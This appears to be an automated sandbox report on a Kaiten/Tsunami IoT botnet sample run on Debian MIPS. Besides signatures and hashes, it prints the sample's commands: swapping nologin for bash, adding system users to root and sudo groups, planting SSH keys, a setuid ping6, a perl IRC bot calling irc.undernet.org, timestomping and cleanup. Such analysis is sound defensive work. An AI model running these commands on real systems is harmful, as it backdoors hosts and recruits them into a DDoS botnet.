Analysis
-
max time kernel
147s -
max time network
149s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
-
submitted
28-08-2024 20:55
General
-
Target
go
-
Size
3KB
-
MD5
7ecb186e0f39db85c9e668dcb1bac301
-
SHA1
e42e91afdad6e32858c62700dd859011b653a80c
-
SHA256
e228c6a2e62ccd691cc3534b1302a301bd6fa66e6e0c44a26677d4f00cbfa6b5
-
SHA512
b1df507c89e5ebcb615b79c36879b2cf2b81ed705878fcfc990d39c86f428743d8d2b7b27e308d52f13e407bdeed93943f4c239b273c1747bca5a37bdf4f9eb1
Malware Config
Signatures
-
Detects Kaiten/Tsunami Payload 3 IoCs
-
Detects Kaiten/Tsunami payload 2 IoCs
-
Kaiten/Tsunami
Linux-based IoT botnet which is controlled through IRC and normally used to carry out DDoS attacks.
-
Adds new SSH keys 2 IoCs
Linux special file to hold SSH keys. The threat actor may add new keys for further remote access.
-
Modifies password files for system users/ groups 16 IoCs
Modifies files storing password hashes of existing users/ groups, likely to grant additional privileges.
-
Write file to user bin folder 1 TTPs 1 IoCs
-
Writes file to system bin folder 1 TTPs 64 IoCs
-
Changes its process name 2 IoCs
-
Reads runtime system information 18 IoCs
Reads data from /proc virtual filesystem.
-
Writes file to tmp directory 36 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/go/tmp/go1⤵
- Adds new SSH keys
-
/usr/bin/gccgcc -o /usr/share/man/man1/kwk a.c2⤵
- Writes file to tmp directory
-
/usr/lib/gcc/mips-linux-gnu/6/cc1/usr/lib/gcc/mips-linux-gnu/6/cc1 -quiet -imultiarch mips-linux-gnu a.c -meb -quiet -dumpbase a.c "-march=mips32r2" -mfpxx -mllsc -mno-lxc1-sxc1 -mips32r2 "-mabi=32" -auxbase a -o /tmp/ccz7UPew.s3⤵
- Writes file to tmp directory
-
-
/usr/local/sbin/asas -EB -mips32r2 -O1 -no-mdebug "-mabi=32" "-march=mips32r2" -mfpxx -KPIC -o /tmp/ccocYBgz.o /tmp/ccz7UPew.s3⤵
-
-
/usr/local/bin/asas -EB -mips32r2 -O1 -no-mdebug "-mabi=32" "-march=mips32r2" -mfpxx -KPIC -o /tmp/ccocYBgz.o /tmp/ccz7UPew.s3⤵
-
-
/usr/sbin/asas -EB -mips32r2 -O1 -no-mdebug "-mabi=32" "-march=mips32r2" -mfpxx -KPIC -o /tmp/ccocYBgz.o /tmp/ccz7UPew.s3⤵
-
-
/usr/bin/asas -EB -mips32r2 -O1 -no-mdebug "-mabi=32" "-march=mips32r2" -mfpxx -KPIC -o /tmp/ccocYBgz.o /tmp/ccz7UPew.s3⤵
- Writes file to tmp directory
-
-
/usr/lib/gcc/mips-linux-gnu/6/collect2/usr/lib/gcc/mips-linux-gnu/6/collect2 -plugin /usr/lib/gcc/mips-linux-gnu/6/liblto_plugin.so "-plugin-opt=/usr/lib/gcc/mips-linux-gnu/6/lto-wrapper" "-plugin-opt=-fresolution=/tmp/ccXMlMkz.res" "-plugin-opt=-pass-through=-lgcc" "-plugin-opt=-pass-through=-lgcc_s" "-plugin-opt=-pass-through=-lc" "-plugin-opt=-pass-through=-lgcc" "-plugin-opt=-pass-through=-lgcc_s" "--sysroot=/" --build-id --eh-frame-hdr -EB -mips32r2 -dynamic-linker /lib/ld.so.1 -melf32btsmip -pie -o /usr/share/man/man1/kwk /usr/lib/gcc/mips-linux-gnu/6/../../../mips-linux-gnu/Scrt1.o /usr/lib/gcc/mips-linux-gnu/6/../../../mips-linux-gnu/crti.o /usr/lib/gcc/mips-linux-gnu/6/crtbeginS.o -L/usr/lib/gcc/mips-linux-gnu/6 -L/usr/lib/gcc/mips-linux-gnu/6/../../../mips-linux-gnu -L/usr/lib/gcc/mips-linux-gnu/6/../../../../lib -L/lib/mips-linux-gnu -L/lib/../lib -L/usr/lib/mips-linux-gnu -L/usr/lib/../lib -L/usr/lib/gcc/mips-linux-gnu/6/../../.. /tmp/ccocYBgz.o -lgcc --as-needed -lgcc_s --no-as-needed -lc -lgcc --as-needed -lgcc_s --no-as-needed /usr/lib/gcc/mips-linux-gnu/6/crtendS.o /usr/lib/gcc/mips-linux-gnu/6/../../../mips-linux-gnu/crtn.o3⤵
- Writes file to tmp directory
-
/usr/bin/ld/usr/bin/ld -plugin /usr/lib/gcc/mips-linux-gnu/6/liblto_plugin.so "-plugin-opt=/usr/lib/gcc/mips-linux-gnu/6/lto-wrapper" "-plugin-opt=-fresolution=/tmp/ccXMlMkz.res" "-plugin-opt=-pass-through=-lgcc" "-plugin-opt=-pass-through=-lgcc_s" "-plugin-opt=-pass-through=-lc" "-plugin-opt=-pass-through=-lgcc" "-plugin-opt=-pass-through=-lgcc_s" "--sysroot=/" --build-id --eh-frame-hdr -EB -mips32r2 -dynamic-linker /lib/ld.so.1 -melf32btsmip -pie -o /usr/share/man/man1/kwk /usr/lib/gcc/mips-linux-gnu/6/../../../mips-linux-gnu/Scrt1.o /usr/lib/gcc/mips-linux-gnu/6/../../../mips-linux-gnu/crti.o /usr/lib/gcc/mips-linux-gnu/6/crtbeginS.o -L/usr/lib/gcc/mips-linux-gnu/6 -L/usr/lib/gcc/mips-linux-gnu/6/../../../mips-linux-gnu -L/usr/lib/gcc/mips-linux-gnu/6/../../../../lib -L/lib/mips-linux-gnu -L/lib/../lib -L/usr/lib/mips-linux-gnu -L/usr/lib/../lib -L/usr/lib/gcc/mips-linux-gnu/6/../../.. /tmp/ccocYBgz.o -lgcc --as-needed -lgcc_s --no-as-needed -lc -lgcc --as-needed -lgcc_s --no-as-needed /usr/lib/gcc/mips-linux-gnu/6/crtendS.o /usr/lib/gcc/mips-linux-gnu/6/../../../mips-linux-gnu/crtn.o4⤵
-
-
-
-
/tmp/distro./distro2⤵
-
-
/bin/rmrm -rf /sbin/nologin2⤵
-
-
/bin/rmrm -rf /usr/sbin/nologin2⤵
-
-
/bin/rmrm -rf /bin/false2⤵
-
-
/bin/cpcp /bin/bash /bin/false2⤵
- Reads runtime system information
-
-
/bin/cpcp /bin/bash /usr/sbin/nologin2⤵
- Write file to user bin folder
- Reads runtime system information
-
-
/bin/cpcp /bin/bash /sbin/nologin2⤵
- Reads runtime system information
-
-
/usr/sbin/usermodusermod -G root nobody2⤵
- Modifies password files for system users/ groups
- Reads runtime system information
-
/usr/sbin/nscdnscd -i passwd3⤵
-
-
/usr/sbin/nscdnscd -i group3⤵
-
-
/usr/sbin/nscdnscd -i passwd3⤵
-
-
/usr/sbin/nscdnscd -i group3⤵
-
-
-
/usr/sbin/usermodusermod -G root bin2⤵
- Modifies password files for system users/ groups
- Reads runtime system information
-
/usr/sbin/nscdnscd -i passwd3⤵
-
-
/usr/sbin/nscdnscd -i group3⤵
-
-
/usr/sbin/nscdnscd -i passwd3⤵
-
-
/usr/sbin/nscdnscd -i group3⤵
-
-
-
/usr/sbin/usermodusermod -G sudo nobody2⤵
- Modifies password files for system users/ groups
- Reads runtime system information
-
/usr/sbin/nscdnscd -i passwd3⤵
-
-
/usr/sbin/nscdnscd -i group3⤵
-
-
/usr/sbin/nscdnscd -i passwd3⤵
-
-
/usr/sbin/nscdnscd -i group3⤵
-
-
-
/usr/sbin/usermodusermod -G sudo bin2⤵
- Modifies password files for system users/ groups
- Reads runtime system information
-
/usr/sbin/nscdnscd -i passwd3⤵
-
-
/usr/sbin/nscdnscd -i group3⤵
-
-
/usr/sbin/nscdnscd -i passwd3⤵
-
-
/usr/sbin/nscdnscd -i group3⤵
-
-
-
/bin/rmrm -rf "/bin/.ssh/authorized*"2⤵
-
-
/bin/rmrm -rf "/usr/games/.ssh/authorized*"2⤵
-
-
/bin/mkdirmkdir /bin/.ssh -p2⤵
- Reads runtime system information
-
-
/bin/mkdirmkdir /usr/games/.ssh -p2⤵
- Reads runtime system information
-
-
/bin/mkdirmkdir /root/.ssh -p2⤵
- Reads runtime system information
-
-
/bin/mkdirmkdir /usr/games/.ssh -p2⤵
- Reads runtime system information
-
-
/usr/bin/whoamiwhoami2⤵
-
-
/bin/hostnamehostname2⤵
-
-
/bin/mkdirmkdir /root/.ssh -p2⤵
- Reads runtime system information
-
-
/usr/bin/whoamiwhoami2⤵
-
-
/bin/hostnamehostname2⤵
-
-
/bin/chmodchmod 600 /root/.ssh/authorized_keys2⤵
-
-
/bin/chmodchmod 755 /usr/games/.ssh2⤵
-
-
/bin/chmodchmod 600 /usr/games/.ssh/authorized_keys2⤵
-
-
/bin/chownchown games:games /usr/games/.ssh/2⤵
-
-
/bin/chownchown games:games /usr/games/.ssh/authorized_keys2⤵
-
-
/bin/chownchown bin:bin /usr/bin/.ssh/2⤵
-
-
/bin/chownchown bin:bin "/usr/bin/.ssh/au*"2⤵
-
-
/bin/rmrm -rf /bin/ping6 /sbin/ping62⤵
-
-
/usr/bin/gccgcc -o /bin/ping6 ping.c2⤵
- Writes file to tmp directory
-
/usr/lib/gcc/mips-linux-gnu/6/cc1/usr/lib/gcc/mips-linux-gnu/6/cc1 -quiet -imultiarch mips-linux-gnu ping.c -meb -quiet -dumpbase ping.c "-march=mips32r2" -mfpxx -mllsc -mno-lxc1-sxc1 -mips32r2 "-mabi=32" -auxbase ping -o /tmp/ccVbylsk.s3⤵
- Writes file to tmp directory
-
-
/usr/local/sbin/asas -EB -mips32r2 -O1 -no-mdebug "-mabi=32" "-march=mips32r2" -mfpxx -KPIC -o /tmp/ccTzBegO.o /tmp/ccVbylsk.s3⤵
-
-
/usr/local/bin/asas -EB -mips32r2 -O1 -no-mdebug "-mabi=32" "-march=mips32r2" -mfpxx -KPIC -o /tmp/ccTzBegO.o /tmp/ccVbylsk.s3⤵
-
-
/usr/sbin/asas -EB -mips32r2 -O1 -no-mdebug "-mabi=32" "-march=mips32r2" -mfpxx -KPIC -o /tmp/ccTzBegO.o /tmp/ccVbylsk.s3⤵
-
-
/usr/bin/asas -EB -mips32r2 -O1 -no-mdebug "-mabi=32" "-march=mips32r2" -mfpxx -KPIC -o /tmp/ccTzBegO.o /tmp/ccVbylsk.s3⤵
- Writes file to tmp directory
-
-
/usr/lib/gcc/mips-linux-gnu/6/collect2/usr/lib/gcc/mips-linux-gnu/6/collect2 -plugin /usr/lib/gcc/mips-linux-gnu/6/liblto_plugin.so "-plugin-opt=/usr/lib/gcc/mips-linux-gnu/6/lto-wrapper" "-plugin-opt=-fresolution=/tmp/cc9SjUWR.res" "-plugin-opt=-pass-through=-lgcc" "-plugin-opt=-pass-through=-lgcc_s" "-plugin-opt=-pass-through=-lc" "-plugin-opt=-pass-through=-lgcc" "-plugin-opt=-pass-through=-lgcc_s" "--sysroot=/" --build-id --eh-frame-hdr -EB -mips32r2 -dynamic-linker /lib/ld.so.1 -melf32btsmip -pie -o /bin/ping6 /usr/lib/gcc/mips-linux-gnu/6/../../../mips-linux-gnu/Scrt1.o /usr/lib/gcc/mips-linux-gnu/6/../../../mips-linux-gnu/crti.o /usr/lib/gcc/mips-linux-gnu/6/crtbeginS.o -L/usr/lib/gcc/mips-linux-gnu/6 -L/usr/lib/gcc/mips-linux-gnu/6/../../../mips-linux-gnu -L/usr/lib/gcc/mips-linux-gnu/6/../../../../lib -L/lib/mips-linux-gnu -L/lib/../lib -L/usr/lib/mips-linux-gnu -L/usr/lib/../lib -L/usr/lib/gcc/mips-linux-gnu/6/../../.. /tmp/ccTzBegO.o -lgcc --as-needed -lgcc_s --no-as-needed -lc -lgcc --as-needed -lgcc_s --no-as-needed /usr/lib/gcc/mips-linux-gnu/6/crtendS.o /usr/lib/gcc/mips-linux-gnu/6/../../../mips-linux-gnu/crtn.o3⤵
- Writes file to tmp directory
-
/usr/bin/ld/usr/bin/ld -plugin /usr/lib/gcc/mips-linux-gnu/6/liblto_plugin.so "-plugin-opt=/usr/lib/gcc/mips-linux-gnu/6/lto-wrapper" "-plugin-opt=-fresolution=/tmp/cc9SjUWR.res" "-plugin-opt=-pass-through=-lgcc" "-plugin-opt=-pass-through=-lgcc_s" "-plugin-opt=-pass-through=-lc" "-plugin-opt=-pass-through=-lgcc" "-plugin-opt=-pass-through=-lgcc_s" "--sysroot=/" --build-id --eh-frame-hdr -EB -mips32r2 -dynamic-linker /lib/ld.so.1 -melf32btsmip -pie -o /bin/ping6 /usr/lib/gcc/mips-linux-gnu/6/../../../mips-linux-gnu/Scrt1.o /usr/lib/gcc/mips-linux-gnu/6/../../../mips-linux-gnu/crti.o /usr/lib/gcc/mips-linux-gnu/6/crtbeginS.o -L/usr/lib/gcc/mips-linux-gnu/6 -L/usr/lib/gcc/mips-linux-gnu/6/../../../mips-linux-gnu -L/usr/lib/gcc/mips-linux-gnu/6/../../../../lib -L/lib/mips-linux-gnu -L/lib/../lib -L/usr/lib/mips-linux-gnu -L/usr/lib/../lib -L/usr/lib/gcc/mips-linux-gnu/6/../../.. /tmp/ccTzBegO.o -lgcc --as-needed -lgcc_s --no-as-needed -lc -lgcc --as-needed -lgcc_s --no-as-needed /usr/lib/gcc/mips-linux-gnu/6/crtendS.o /usr/lib/gcc/mips-linux-gnu/6/../../../mips-linux-gnu/crtn.o4⤵
- Writes file to system bin folder
-
-
-
-
/bin/chmodchmod u+xs /bin/ping62⤵
-
-
/bin/cpcp /bin/ping6 /sbin/uid2⤵
- Writes file to system bin folder
- Reads runtime system information
-
-
/bin/cpcp /bin/ping6 /usr/include/bakla.h2⤵
- Reads runtime system information
-
-
/usr/bin/gccgcc -DLINUX -Wall -o /bin/cls cls.c2⤵
- Writes file to tmp directory
-
/usr/lib/gcc/mips-linux-gnu/6/cc1/usr/lib/gcc/mips-linux-gnu/6/cc1 -quiet -imultiarch mips-linux-gnu -D LINUX cls.c -meb -quiet -dumpbase cls.c "-march=mips32r2" -mfpxx -mllsc -mno-lxc1-sxc1 -mips32r2 "-mabi=32" -auxbase cls -Wall -o /tmp/cc7Xxe01.s3⤵
- Writes file to tmp directory
-
-
/usr/local/sbin/asas -EB -mips32r2 -O1 -no-mdebug "-mabi=32" "-march=mips32r2" -mfpxx -KPIC -o /tmp/ccaV6vxt.o /tmp/cc7Xxe01.s3⤵
-
-
/usr/local/bin/asas -EB -mips32r2 -O1 -no-mdebug "-mabi=32" "-march=mips32r2" -mfpxx -KPIC -o /tmp/ccaV6vxt.o /tmp/cc7Xxe01.s3⤵
-
-
/usr/sbin/asas -EB -mips32r2 -O1 -no-mdebug "-mabi=32" "-march=mips32r2" -mfpxx -KPIC -o /tmp/ccaV6vxt.o /tmp/cc7Xxe01.s3⤵
-
-
/usr/bin/asas -EB -mips32r2 -O1 -no-mdebug "-mabi=32" "-march=mips32r2" -mfpxx -KPIC -o /tmp/ccaV6vxt.o /tmp/cc7Xxe01.s3⤵
- Writes file to tmp directory
-
-
/usr/lib/gcc/mips-linux-gnu/6/collect2/usr/lib/gcc/mips-linux-gnu/6/collect2 -plugin /usr/lib/gcc/mips-linux-gnu/6/liblto_plugin.so "-plugin-opt=/usr/lib/gcc/mips-linux-gnu/6/lto-wrapper" "-plugin-opt=-fresolution=/tmp/cc6efjxw.res" "-plugin-opt=-pass-through=-lgcc" "-plugin-opt=-pass-through=-lgcc_s" "-plugin-opt=-pass-through=-lc" "-plugin-opt=-pass-through=-lgcc" "-plugin-opt=-pass-through=-lgcc_s" "--sysroot=/" --build-id --eh-frame-hdr -EB -mips32r2 -dynamic-linker /lib/ld.so.1 -melf32btsmip -pie -o /bin/cls /usr/lib/gcc/mips-linux-gnu/6/../../../mips-linux-gnu/Scrt1.o /usr/lib/gcc/mips-linux-gnu/6/../../../mips-linux-gnu/crti.o /usr/lib/gcc/mips-linux-gnu/6/crtbeginS.o -L/usr/lib/gcc/mips-linux-gnu/6 -L/usr/lib/gcc/mips-linux-gnu/6/../../../mips-linux-gnu -L/usr/lib/gcc/mips-linux-gnu/6/../../../../lib -L/lib/mips-linux-gnu -L/lib/../lib -L/usr/lib/mips-linux-gnu -L/usr/lib/../lib -L/usr/lib/gcc/mips-linux-gnu/6/../../.. /tmp/ccaV6vxt.o -lgcc --as-needed -lgcc_s --no-as-needed -lc -lgcc --as-needed -lgcc_s --no-as-needed /usr/lib/gcc/mips-linux-gnu/6/crtendS.o /usr/lib/gcc/mips-linux-gnu/6/../../../mips-linux-gnu/crtn.o3⤵
- Writes file to tmp directory
-
/usr/bin/ld/usr/bin/ld -plugin /usr/lib/gcc/mips-linux-gnu/6/liblto_plugin.so "-plugin-opt=/usr/lib/gcc/mips-linux-gnu/6/lto-wrapper" "-plugin-opt=-fresolution=/tmp/cc6efjxw.res" "-plugin-opt=-pass-through=-lgcc" "-plugin-opt=-pass-through=-lgcc_s" "-plugin-opt=-pass-through=-lc" "-plugin-opt=-pass-through=-lgcc" "-plugin-opt=-pass-through=-lgcc_s" "--sysroot=/" --build-id --eh-frame-hdr -EB -mips32r2 -dynamic-linker /lib/ld.so.1 -melf32btsmip -pie -o /bin/cls /usr/lib/gcc/mips-linux-gnu/6/../../../mips-linux-gnu/Scrt1.o /usr/lib/gcc/mips-linux-gnu/6/../../../mips-linux-gnu/crti.o /usr/lib/gcc/mips-linux-gnu/6/crtbeginS.o -L/usr/lib/gcc/mips-linux-gnu/6 -L/usr/lib/gcc/mips-linux-gnu/6/../../../mips-linux-gnu -L/usr/lib/gcc/mips-linux-gnu/6/../../../../lib -L/lib/mips-linux-gnu -L/lib/../lib -L/usr/lib/mips-linux-gnu -L/usr/lib/../lib -L/usr/lib/gcc/mips-linux-gnu/6/../../.. /tmp/ccaV6vxt.o -lgcc --as-needed -lgcc_s --no-as-needed -lc -lgcc --as-needed -lgcc_s --no-as-needed /usr/lib/gcc/mips-linux-gnu/6/crtendS.o /usr/lib/gcc/mips-linux-gnu/6/../../../mips-linux-gnu/crtn.o4⤵
-
-
-
-
/usr/bin/gccgcc clean.c -o /bin/clean -D Linux2⤵
- Writes file to tmp directory
-
/usr/lib/gcc/mips-linux-gnu/6/cc1/usr/lib/gcc/mips-linux-gnu/6/cc1 -quiet -imultiarch mips-linux-gnu -D Linux clean.c -meb -quiet -dumpbase clean.c "-march=mips32r2" -mfpxx -mllsc -mno-lxc1-sxc1 -mips32r2 "-mabi=32" -auxbase clean -o /tmp/ccYiFRVf.s3⤵
- Writes file to tmp directory
-
-
/usr/local/sbin/asas -EB -mips32r2 -O1 -no-mdebug "-mabi=32" "-march=mips32r2" -mfpxx -KPIC -o /tmp/ccZNpofo.o /tmp/ccYiFRVf.s3⤵
-
-
/usr/local/bin/asas -EB -mips32r2 -O1 -no-mdebug "-mabi=32" "-march=mips32r2" -mfpxx -KPIC -o /tmp/ccZNpofo.o /tmp/ccYiFRVf.s3⤵
-
-
/usr/sbin/asas -EB -mips32r2 -O1 -no-mdebug "-mabi=32" "-march=mips32r2" -mfpxx -KPIC -o /tmp/ccZNpofo.o /tmp/ccYiFRVf.s3⤵
-
-
/usr/bin/asas -EB -mips32r2 -O1 -no-mdebug "-mabi=32" "-march=mips32r2" -mfpxx -KPIC -o /tmp/ccZNpofo.o /tmp/ccYiFRVf.s3⤵
- Writes file to tmp directory
-
-
/usr/lib/gcc/mips-linux-gnu/6/collect2/usr/lib/gcc/mips-linux-gnu/6/collect2 -plugin /usr/lib/gcc/mips-linux-gnu/6/liblto_plugin.so "-plugin-opt=/usr/lib/gcc/mips-linux-gnu/6/lto-wrapper" "-plugin-opt=-fresolution=/tmp/ccNlEovC.res" "-plugin-opt=-pass-through=-lgcc" "-plugin-opt=-pass-through=-lgcc_s" "-plugin-opt=-pass-through=-lc" "-plugin-opt=-pass-through=-lgcc" "-plugin-opt=-pass-through=-lgcc_s" "--sysroot=/" --build-id --eh-frame-hdr -EB -mips32r2 -dynamic-linker /lib/ld.so.1 -melf32btsmip -pie -o /bin/clean /usr/lib/gcc/mips-linux-gnu/6/../../../mips-linux-gnu/Scrt1.o /usr/lib/gcc/mips-linux-gnu/6/../../../mips-linux-gnu/crti.o /usr/lib/gcc/mips-linux-gnu/6/crtbeginS.o -L/usr/lib/gcc/mips-linux-gnu/6 -L/usr/lib/gcc/mips-linux-gnu/6/../../../mips-linux-gnu -L/usr/lib/gcc/mips-linux-gnu/6/../../../../lib -L/lib/mips-linux-gnu -L/lib/../lib -L/usr/lib/mips-linux-gnu -L/usr/lib/../lib -L/usr/lib/gcc/mips-linux-gnu/6/../../.. /tmp/ccZNpofo.o -lgcc --as-needed -lgcc_s --no-as-needed -lc -lgcc --as-needed -lgcc_s --no-as-needed /usr/lib/gcc/mips-linux-gnu/6/crtendS.o /usr/lib/gcc/mips-linux-gnu/6/../../../mips-linux-gnu/crtn.o3⤵
- Writes file to tmp directory
-
/usr/bin/ld/usr/bin/ld -plugin /usr/lib/gcc/mips-linux-gnu/6/liblto_plugin.so "-plugin-opt=/usr/lib/gcc/mips-linux-gnu/6/lto-wrapper" "-plugin-opt=-fresolution=/tmp/ccNlEovC.res" "-plugin-opt=-pass-through=-lgcc" "-plugin-opt=-pass-through=-lgcc_s" "-plugin-opt=-pass-through=-lc" "-plugin-opt=-pass-through=-lgcc" "-plugin-opt=-pass-through=-lgcc_s" "--sysroot=/" --build-id --eh-frame-hdr -EB -mips32r2 -dynamic-linker /lib/ld.so.1 -melf32btsmip -pie -o /bin/clean /usr/lib/gcc/mips-linux-gnu/6/../../../mips-linux-gnu/Scrt1.o /usr/lib/gcc/mips-linux-gnu/6/../../../mips-linux-gnu/crti.o /usr/lib/gcc/mips-linux-gnu/6/crtbeginS.o -L/usr/lib/gcc/mips-linux-gnu/6 -L/usr/lib/gcc/mips-linux-gnu/6/../../../mips-linux-gnu -L/usr/lib/gcc/mips-linux-gnu/6/../../../../lib -L/lib/mips-linux-gnu -L/lib/../lib -L/usr/lib/mips-linux-gnu -L/usr/lib/../lib -L/usr/lib/gcc/mips-linux-gnu/6/../../.. /tmp/ccZNpofo.o -lgcc --as-needed -lgcc_s --no-as-needed -lc -lgcc --as-needed -lgcc_s --no-as-needed /usr/lib/gcc/mips-linux-gnu/6/crtendS.o /usr/lib/gcc/mips-linux-gnu/6/../../../mips-linux-gnu/crtn.o4⤵
-
-
-
-
/usr/bin/perlperl bot gsm.ftp.sh 1080 -bash2⤵
- Changes its process name
-
-
/usr/bin/perlperl bot irc.undernet.org 6667 -bash2⤵
- Changes its process name
-
-
/usr/bin/touchtouch -d "Dec 1 2018" /root/.ssh /root/.ssh/authorized_keys /bin/bash /bin/bunzip2 /bin/busybox /bin/bzcat /bin/bzcmp /bin/bzdiff /bin/bzegrep /bin/bzexe /bin/bzfgrep /bin/bzgrep /bin/bzip2 /bin/bzip2recover /bin/bzless /bin/bzmore /bin/cat /bin/chgrp /bin/chmod /bin/chown /bin/chvt /bin/clean /bin/cls /bin/cp /bin/cpio /bin/dash /bin/date /bin/dd /bin/df /bin/dir /bin/dmesg /bin/dnsdomainname /bin/domainname /bin/dumpkeys /bin/echo /bin/egrep /bin/false /bin/fgconsole /bin/fgrep /bin/findmnt /bin/fuser /bin/grep /bin/gunzip /bin/gzexe /bin/gzip /bin/hostname /bin/ip /bin/journalctl /bin/kbd_mode /bin/kill /bin/kmod /bin/ln /bin/loadkeys /bin/login /bin/loginctl /bin/ls /bin/lsblk /bin/lsmod /bin/mkdir /bin/mknod /bin/mktemp /bin/more /bin/mount /bin/mountpoint /bin/mt /bin/mt-gnu /bin/mv /bin/nano /bin/networkctl /bin/nisdomainname /bin/open /bin/openvt /bin/pidof /bin/ping /bin/ping4 /bin/ping6 /bin/ps /bin/pwd /bin/rbash /bin/readlink /bin/rm /bin/rmdir /bin/rnano /bin/run-parts /bin/sed /bin/setfont /bin/setupcon /bin/sh /bin/sh.distrib /bin/sleep /bin/ss /bin/stty /bin/su /bin/sync /bin/systemctl /bin/systemd /bin/systemd-ask-password /bin/systemd-escape /bin/systemd-hwdb /bin/systemd-inhibit /bin/systemd-machine-id-setup /bin/systemd-notify /bin/systemd-sysusers /bin/systemd-tmpfiles /bin/systemd-tty-ask-password-agent /bin/tailf /bin/tar /bin/tempfile /bin/touch /bin/true /bin/udevadm /bin/umount /bin/uname /bin/uncompress /bin/unicode_start /bin/vdir /bin/wdctl /bin/which /bin/ypdomainname /bin/zcat /bin/zcmp /bin/zdiff /bin/zegrep /bin/zfgrep /bin/zforce /bin/zgrep /bin/zless /bin/zmore /bin/znew /bin/.ssh/authorized_keys /bin /boot /dev /etc /home /initrd.img /initrd.img.old /lib /lost+found /media /mnt /opt /proc /root /run /sbin /srv /sys /tmp /usr /var /vmlinux /vmlinux.old /sbin/agetty /sbin/audispd /sbin/auditctl /sbin/auditd /sbin/augenrules /sbin/aureport /sbin/ausearch /sbin/autrace /sbin/badblocks /sbin/blkdeactivate /sbin/blkdiscard /sbin/blkid /sbin/blockdev /sbin/bridge /sbin/cfdisk /sbin/chcpu /sbin/ctrlaltdel /sbin/debugfs /sbin/depmod /sbin/devlink /sbin/dhclient /sbin/dhclient-script /sbin/discover /sbin/discover-modprobe /sbin/discover-pkginstall /sbin/dmsetup /sbin/dmstats /sbin/dumpe2fs /sbin/e2fsck /sbin/e2image /sbin/e2label /sbin/e2undo /sbin/fdisk /sbin/findfs /sbin/fixfiles /sbin/fsck /sbin/fsck.cramfs /sbin/fsck.ext2 /sbin/fsck.ext3 /sbin/fsck.ext4 /sbin/fsck.minix /sbin/fsfreeze /sbin/fstab-decode /sbin/fstrim /sbin/getty /sbin/halt /sbin/hwclock /sbin/ifdown /sbin/ifquery /sbin/ifup /sbin/init /sbin/insmod /sbin/installkernel /sbin/ip /sbin/ip6tables /sbin/ip6tables-restore /sbin/ip6tables-save /sbin/iptables /sbin/iptables-restore /sbin/iptables-save /sbin/isosize /sbin/kbdrate /sbin/killall5 /sbin/ldconfig /sbin/load_policy /sbin/logsave /sbin/losetup /sbin/lsmod /sbin/mke2fs /sbin/mkfs /sbin/mkfs.bfs /sbin/mkfs.cramfs /sbin/mkfs.ext2 /sbin/mkfs.ext3 /sbin/mkfs.ext4 /sbin/mkfs.minix /sbin/mkhomedir_helper /sbin/mkswap /sbin/modinfo /sbin/modprobe /sbin/nologin /sbin/pam_tally /sbin/pam_tally2 /sbin/pivot_root /sbin/poweroff /sbin/raw /sbin/reboot /sbin/resize2fs /sbin/restorecon /sbin/restorecon_xattr /sbin/rmmod /sbin/rtacct /sbin/rtmon /sbin/runlevel /sbin/runuser /sbin/setfiles /sbin/sfdisk /sbin/shadowconfig /sbin/shutdown /sbin/start-stop-daemon /sbin/sulogin /sbin/swaplabel /sbin/swapoff /sbin/swapon /sbin/switch_root /sbin/sysctl /sbin/tc /sbin/telinit /sbin/tipc /sbin/tune2fs /sbin/udevadm /sbin/uid /sbin/unix_chkpwd /sbin/unix_update /sbin/wipefs /sbin/xtables-multi /sbin/zramctl2⤵
- Adds new SSH keys
- Writes file to system bin folder
-
-
/bin/rmrm -rf a.c ".reboot*" a.c clean.c cls.c ping.c "scan*" distro go "go.tgz*" cls.c clean.c bot ping.c go "wz*"2⤵
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
381B
MD5fada28f9405c20320d0169f7549137da
SHA153f934539664a6e2c0ef06317b8518385e1272aa
SHA256e962c1d303f7d1b24325d7e8165e7b3c157455c07d666af1a5bfce4e6bcb8640
SHA512caf57f3fef4eccef88a83c74ec9b53ffffe52bfc6ba809957991beedebf581f427994a59bdec5cb9e5c9b361e6c646501f952d7941acc4ef90721f7bc6399784
-
Filesize
27KB
MD52c7aa8cf9ea2ee1b14d55104c885294f
SHA1fe3cf8bf540a2b4b6843f5e9c8c38abc805e91b1
SHA2568968ba1c231db2d8e422ffcfc8f0b1877397d7320a5e24d6928597f46a6e7371
SHA512607c040d16d4988e06effb81c56c4afc3f32aecb545760e1d4c114c335d5e5468cfa0247fcf5c8b9cd4fbb64b41ade33a8994adfe58231ae63fde1a63eae74c9
-
Filesize
23KB
MD516c4d4e66222eb6f4cba4859fe22963c
SHA1edaa7fe6f7920f04c8fab73cb5a311dd1078eda5
SHA2567f50686803effd6f0dbcf58db615d327e99d6d4d494fd286f198d6729097a334
SHA5124177405c8271299a9e310b594b76e50126d1b8a4a23e091eead19de746f525fdcc07ab906d9df7b8099fb8d93a1f12008d06040c9310079722a1452802117cb5
-
Filesize
1.2MB
MD559d4ddd8dafe5d32d364d3f079f9d047
SHA1123c130531cd265e7a4ed43ac71ea9b280ccf15c
SHA2560df0983446a29ee4a99d696871c53ff5346a282fdddb85779cd1ccb338bc18d2
SHA512433fb7514c3ea8eba49980a97004e19d104643a93df08fb28d9e6886c2ccf845b894b3dd7e42dccfa493b4f8d58dfa2056677e370dcba10096fe886c3d0545a9
-
Filesize
6KB
MD52966247931f0452caed46f0e53982692
SHA14f637b875a8713aa0a8c62eb887517a77cf150eb
SHA2565121053834f40bc137443e57fc5a981ea9a133a8bf50df7716ca5215bc22931d
SHA512be0d7fdf9cd5a533c1e15460034503b43f9b25819b2c226ff024dac0a2e708633b06eb9206846b700125e456dca55c2374f8dcb8bf55e69fed291d34186557a4
-
Filesize
705B
MD5cf124b9edd110708e2b22b758ad0d835
SHA15d07eabc77d7f46283cea67ac8a89208956c3eaa
SHA2565561a4c4229ed03e9a63526205ee0a8c9f012bd8bab8feef18126598ee3f1517
SHA512076423cc2d6954d7ccfa1b70f75d4f137ceda38eeb8e69c79d146de2a307292b922145d2888b4794ec9e22584609d2d156975a286b0245307fcdc777c0d60512
-
Filesize
709B
MD5c6129bfd885a1213cd7ad471efb3ba74
SHA1b5e523796bdab13a8fb71f7c5072df649709474b
SHA25644c7c37e619aa264615e910cec3e6298267d531f8b2c94867984d931d38a11b3
SHA512c9f090c2e271c7f7718ebb946ed0c80e789e6cae5755817626a0bfa1287bdbcfed80f5fd5e6b6fab428e7b1ae3f444fbd7e0781761917e14a651fddd7f5013d5
-
Filesize
709B
